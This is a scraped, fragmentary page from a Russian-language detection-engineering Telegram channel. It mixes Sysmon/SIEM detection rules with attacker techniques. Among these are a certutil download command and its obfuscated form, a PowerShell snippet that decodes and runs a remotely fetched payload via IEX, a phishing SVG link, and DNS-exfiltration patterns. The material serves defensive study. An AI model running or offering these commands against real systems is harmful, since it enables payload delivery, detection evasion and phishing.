chat: https://t.me/+BF4T6DOGv_UwYTBi
contact: @siemmanager
email: manager@detectioneasy.ru
Post #135
213
Когда рансомварь пришла в гости 😅
DE @detectioneasy
Showing posts older than #136 · Back to latest
Detection is easy 🔤🔤 Этап 2 — Сортировка требований на разработку Всем привет 👋! Продолжаем формировать процесс Detection Engineering в компании World of Detection. К этому моменту у нас уже внедрен трекер задач для учета и ведется активная разработка и доработка правил обнаружения.…

World of Detection разибирают накопившиеся таски. Руководство решило определить формулу расчета критичности задач.1-3 - низкий
4-7 - средний
8-10 - высокий
10+ - критический
E2 A0 80 из шрифта Брайля, чтобы не было видно второго расширения файла - HTA.
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName = "\.[\w\d]+\s{2,}\.[\w\d]+"
Forwarded from Ralf Hacker Channel (Ralf Hacker)

cleanmgr.exeProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName endswith "\System32\System32\System32\dokannp1.dll"
Detection is easy Всем привет!) 👋 Пытались ли Вы скачать нагрузку с помощью certutil? Наверняка AV/EDR заблокировал Вашу попытку 🤚 Однако, если обфусцировать аргументы команд, попытка может стать успешной 👍 Для cmd/bat появился онлайн-ресурс https://argfuscator.net/, который…
certutil.exe -urlcache -split -f https://www.example.org/file.exe file.exe
CeRtutIL.EXe -uʳLᶜᵃ?ᶜH?E? /ˢᵖˡ??It??ԫ -"F" htt"ps:/"/www.e"xa"m"p"le.o"r"g"/fi"le.e"xe" fi"L"E.exe
ProviderName="Microsoft-Windows-Sysmon" and EventId = 1 and CommandLine = "[\w\d\/\:]+\"+[\w\d\/\:]+"
certutil "https://qwer.qwer", а при обфускации кавычки вставляются в аргументы и их значения, для деления слова на неосмысленные группыwmplayer.exe
& "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "https://pampuna.nl/example/whoami.wma"
Get-ChildItem -Recurse -Force -ErrorAction SilentlyContinue -filter "whoami*.dat" "~\AppData\Local" | ForEach-Object {
Write-Host "Found: $($_.FullName)"
cd $_.DirectoryName
$data = [System.IO.File]::ReadAllBytes($_.FullName)
$base64 = ([System.Text.Encoding]::UTF8.GetString($data) -replace '\b\w{1,5}\b', '') -replace '[^A-Za-z0-9+/=]', ''
Write-Host $base64
$converted = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64))
IEX($converted)
}
conhost.exe в качестве родительского процесса
conhost --headless C:\Users\Public\Libraries\Passport\19.jpg
https://argfuscator.net/, который обфусцирует аргументы. Правила обфускации определены в репозитории проекта Lateral Movement 🧑💻 Хакеры и пентестеры часто используют PsExec или его аналоги psexec.py для продвижения по сети. Что для красных удобно - для синих шумно 🤔
World of detection выбирает SIEM, и наткнулась на руководство от Elastic по выбору SIEM для современного SOC 🧃
RDPWInst.exe, rdpwrap.ini, rdpwrap.txt, rdpwrap.dll
🔤 метаданные файла совпадают с Product: RDP Host Support или Company: Stas'M Corp.HKLM\System\CurrentControlSet\services\TermService\Parameters\ServiceDll\ System32\termsrv.dll, стоит подзадуматься
<svg height="30" width="200" xmlns="http://www.w3.org/2000/svg">
<a href="https://subtettiarrydivisions.s3.us-west-2.amazonaws.com/dzfhoerszgfiuwkeadbfwuoeudjiwsl.html" target="_blank">
<text x="5" y="15" fill="blue">Yzesati Click To Sign </text>
</a>
</svg>
This activity cluster used rare tools and techniques including the technique we call Hex Staging, in which the attackers deliver payloads in chunks. Their activity also includes exfiltration over DNS using ping, and abusing the SQLcmdutility for data theft.
tasklist.exe.outputformatstring.dnslog.pw , на месте tasklist.exe может быть другое имя. Каждый новый домен будет резолвится на dns-серверах, которые под контролем злоумышленников dnslog.pw (не забудьте сделать ретро по свои логам)invoke-webrequest и certutil DLL sideloading, для обхода обнаружения дропается уязвимый легитимный Acrobat.exe и рядышком незаметная Acrobat.DLL которая расшифрует и запустит PlugXHex Staging, суть метода запись файла по кускам в hex, а не полностью, для обхода обнаружения. Далее кодировка меняется с помощью certutil SspiUacBypass (почитать), BadPotato, RasmanPotatoSupershell
Detection is easy Cisco Talos выпустили обзор одной из вредоносных кампаний. 🔤 Атака начинается с фишинга, письмо содержит *.tgz архив с вредоносом внутри 🔤 Когда пользователь открывает архив ему нужно запустить исполняемый файл .NET loader 🔤 Loader, загружает PureCrypter…